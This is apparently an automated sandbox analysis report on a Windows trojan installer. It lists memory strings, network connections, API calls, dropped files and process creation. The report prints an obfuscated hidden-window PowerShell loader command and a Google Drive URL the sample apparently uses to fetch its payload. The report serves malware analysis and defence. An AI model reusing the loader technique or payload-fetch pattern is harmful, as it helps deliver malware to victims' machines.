      Source: msiexec.exe, 00000005.00000003.2083758915.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027596508.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111234763.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613349162.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2055912606.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=downloadn.
      Source: msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=downloadnt
      Source: msiexec.exe, 00000005.00000003.2472914379.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529948184.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613349162.0000000006212000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=downloado1
      Source: msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472914379.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529948184.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613349162.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=downloadoo
      Source: msiexec.exe, 00000005.00000003.2445831272.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166300357.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584795556.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111129957.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248826838.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138530544.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194101706.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083732633.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276930704.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669151935.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472874421.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417373844.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359320119.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502712541.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332761660.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640640069.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221471719.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613309927.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557277262.0000000006259000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=downloadrT
      Source: msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=downloadx
      Source: msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/ie
      Source: msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/jd
      Source: powershell.exe, 00000002.00000002.1839618822.0000000004FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.1850926327.0000000005F05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: msiexec.exe, 00000005.00000002.2678783138.000000000625E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1971022665.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.000000000625D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.000000000625D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-ubM9
      Source: msiexec.exe, 00000005.00000003.2613416047.0000000006206000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1941692265.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027647702.00000000061DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2000450554.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083758915.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1970858876.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1970858876.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502788314.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417445942.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027596508.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584889218.0000000006206000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584889218.00000000061DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: msiexec.exe, 00000005.00000002.2678783138.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584795556.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669151935.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472874421.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502712541.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613309927.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557277262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
      Source: msiexec.exe, 00000005.00000003.2669151935.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1970858876.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472874421.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1970858876.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502788314.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557277262.000000000625E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417445942.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472874421.000000000625E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417373844.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027596508.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359320119.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502712541.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584889218.0000000006206000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584889218.00000000061DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584889218.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613416047.000000000620A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: msiexec.exe, 00000005.00000002.2678783138.000000000625E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1971022665.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.000000000625D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: msiexec.exe, 00000005.00000002.2678783138.000000000625E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1971022665.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.000000000625D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: msiexec.exe, 00000005.00000002.2678783138.000000000625E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1971022665.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.000000000625D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: msiexec.exe, 00000005.00000002.2678783138.000000000625E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1971022665.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.000000000625D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49710 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49714 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49717 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49720 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49721 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49723 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49725 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49726 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49736 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49738 version: TLS 1.2
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeCode function: 0_2_00405194 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405194

      System Summary

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\unshabbily\Hardwire\AwMu7gR48D.exeJump to dropped file
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeCode function: 0_2_004031BB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004031BB
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeCode function: 0_2_004049D30_2_004049D3
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeCode function: 0_2_004065BB0_2_004065BB
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nspE492.tmp\Banner.dll B91763928CE210BFC0A43B0AC1178D68CB95CFAD68439B25B55A53B7AA53B207
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nspE492.tmp\UserInfo.dll 01D867E3A1F0AEC39A4FF02FE9FAFEFC78D6A12390A0DA8ECBF4E7DA5379E42E
      Source: AwMu7gR48D.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.evad.winEXE@6/14@2/2
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeCode function: 0_2_004031BB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004031BB
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeCode function: 0_2_00404460 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404460
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeCode function: 0_2_004020CB CoCreateInstance,MultiByteToWideChar,0_2_004020CB
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeFile created: C:\Users\user\AppData\Local\unshabbilyJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5684:120:WilError_03
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeFile created: C:\Users\user\AppData\Local\Temp\nsjE201.tmpJump to behavior
      Source: AwMu7gR48D.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: AwMu7gR48D.exeReversingLabs: Detection: 57%
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeFile read: C:\Users\user\Desktop\AwMu7gR48D.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\AwMu7gR48D.exe "C:\Users\user\Desktop\AwMu7gR48D.exe"
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Kvalitetssansens=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Tagkamrets.Pan';$Elbowy=$Kvalitetssansens.SubString(54196,3);.$Elbowy($Kvalitetssansens)"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Kvalitetssansens=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Tagkamrets.Pan';$Elbowy=$Kvalitetssansens.SubString(54196,3);.$Elbowy($Kvalitetssansens)"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\AwMu7gR48D.exeSection loaded: userenv.dllJump to behavior
